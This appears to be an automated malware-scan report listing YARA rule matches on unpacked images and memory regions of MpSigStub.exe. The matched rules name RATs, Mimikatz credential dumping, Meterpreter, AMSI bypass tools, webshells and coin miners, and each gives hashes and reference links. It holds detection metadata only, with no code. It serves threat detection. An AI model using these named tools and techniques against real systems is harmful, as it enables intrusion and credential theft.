Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_SharPyShell date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/antonioCoco/SharPyShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_ibombshell date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/Telefonica/ibombshell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: gh0st author = https://github.com/jackcr/
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: NetWiredRC_B date = 2014-12-23, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = NetWiredRC, version = 1.1
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: MAL_AirdViper_Sample_Apr18_1 date = 2018-05-04, hash1 = 9f453f1d5088bd17c60e812289b4bb0a734b7ad2ba5a536f5fd6d6ac3b8f3397, author = Florian Roth, description = Detects Arid Viper malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_AmsiBypass date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/0xB455/AmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 8fa4ba512b34a898c4564a8eac254b6a786d195b
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, type: MEMORY	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic_eval date = 2021/01/07, author = Arnim Rupp, description = Generic PHP webshell which uses any eval/exec function in the same line with user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 90c5cc724ec9cf838e4229e5e08955eec4d7bf95
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
